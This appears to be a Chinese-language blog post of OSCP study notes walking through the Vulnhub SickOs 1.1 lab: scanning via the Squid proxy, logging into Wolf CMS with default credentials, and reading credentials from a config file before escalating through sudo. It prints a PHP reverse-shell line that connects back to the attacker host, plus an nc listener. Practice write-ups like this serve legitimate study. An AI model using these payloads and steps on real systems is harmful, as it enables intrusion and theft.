OSCP备考_0x09_Vulnhub靶机_SickOs: 1.1

Ethan医生8个月前 (06-15)靶场264

名称	说明
靶机下载链接	https://www.vulnhub.com/entry/sickos-11,132/
攻击机（kali）	ip：192.168.233.168
靶机（CentOS）	ip：192.168.233.177

信息收集

Nmap扫描结果：

访问3128端口显示error,根据界面有效信息看到这个服务名及版本squid/3.1.19

直接访问8080端口是拒绝访问的,需要挂代理使用3128端口的代理访问本机80端口

开始扫描目录

dirsearch -u http://192.168.233.177 --proxy=http://192.168.233.177:3128 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt

/connect访问是一个python脚本，输出两句话没什么用

/robots.txt下有一个/wolfcms路径，看名字应该一个cms管理系统

可以上网查询后台入口 http://192.168.233.177/wolfcms/?/admin/login

测试看看账号密码结果是admin admin

点击进去后有可以修改代码的地方将反弹SHELL代码放入后打开页面即可连接

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.233.168/3333 0>&1'"); ?>

监听3333后可以直接执行nc -lvnp 3333

查看里面的config文件发现账号密码

测试看看能不能登入mysql发现被拒绝,再尝试看按能不能sick0s这个账号,sudo -l 有权限

有root权限直接获取底下flag

标签: OSCP

返回列表

先连接到外网开放的服务器openvpn xxx.ovpn信息收集nmap -p- 10.129.216.48 (这样扫描太慢了)nmap -sCV -p- --min-rate 10000 -T4 -...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.254.155 (扫描TCP)查看到版本是2.3,有rcepython3 49125.p...

Bankrobbernmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.228.109 (扫描TCP)80存在apache，所以我们要关注p...

blundernmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.193.124 (扫描TCP)nmap -sU --top-ports 1...

名称说明靶机下载链接https://www.vulnhub.com/entry/lampiao-1,249/攻击机（kali）ip：192.168.233.168靶机（CentOS）ip：192.16...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.184.136 (扫描TCP)nmap -sU --top-ports 100 10.129.184.136...